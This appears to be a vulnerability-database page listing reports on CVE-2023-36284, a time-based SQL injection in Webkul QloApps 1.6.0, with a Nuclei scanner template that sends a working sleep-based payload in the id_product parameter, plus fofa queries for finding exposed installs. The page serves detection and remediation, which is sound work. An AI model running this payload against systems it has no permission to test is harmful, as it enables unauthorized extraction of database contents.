| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2023-36284 | 23 Jun 202316:15 | – | attackerkb | |
| Webkil QloApps SQL注入漏洞 | 23 Jun 202300:00 | – | cnnvd | |
| CVE-2023-36284 | 23 Jun 202300:00 | – | cve | |
| CVE-2023-36284 | 23 Jun 202300:00 | – | cvelist | |
| CVE-2023-36284 | 23 Jun 202316:15 | – | nvd | |
| Sql injection | 23 Jun 202316:15 | – | prion | |
| CVE-2023-36284 | 23 May 202502:29 | – | redhatcve | |
| CVE-2023-36284 | 23 Jun 202300:00 | – | vulnrichment |
id: CVE-2023-36284
info:
name: QloApps 1.6.0 - SQL Injection
author: ritikchaddha
severity: high
description: |
An unauthenticated Time-Based SQL injection found in Webkul QloApps 1.6.0 via GET parameters date_from, date_to, and id_product allows a remote attacker to retrieve the contents of an entire database.
impact: |
Successful exploitation could lead to unauthorized access to sensitive data.
remediation: |
Apply the vendor-supplied patch or upgrade to a non-vulnerable version.
reference:
- https://flashy-lemonade-192.notion.site/Time-Based-SQL-injection-in-QloApps-1-6-0-be3ed1bdaf784a77b45dc6898a2de17e
- https://nvd.nist.gov/vuln/detail/CVE-2023-36284
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-36284
cwe-id: CWE-89
epss-score: 0.03157
epss-percentile: 0.86406
cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: webkul
product: qloapps
fofa-query:
- "title=\"QloApps\""
- title="qloapps"
tags: time-based-sqli,cve,cve2023,qloapps,sqli,webkul,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
internal: true
words:
- "QloApps"
case-insensitive: true
- raw:
- |
@timeout: 20s
GET /quick-order?date_from=2023-06-12%2000:00:00&date_to=2023-06-13%2000:00:00&deleteFromOrderLine=1&id_product=(select(0)from(select(sleep(5)))v) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- duration>=5
- 'contains(body, "<span>Guest Information")'
condition: and
# digest: 4a0a00473045022100b9d20e716d7cab81582c06b460593e9ef3be7a13249362786b086bd49aa90c81022049dda1ef396a1e4013a8fcf0c59b0ddd69e67c6159b291a7dc90f48c5bbf15ef:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation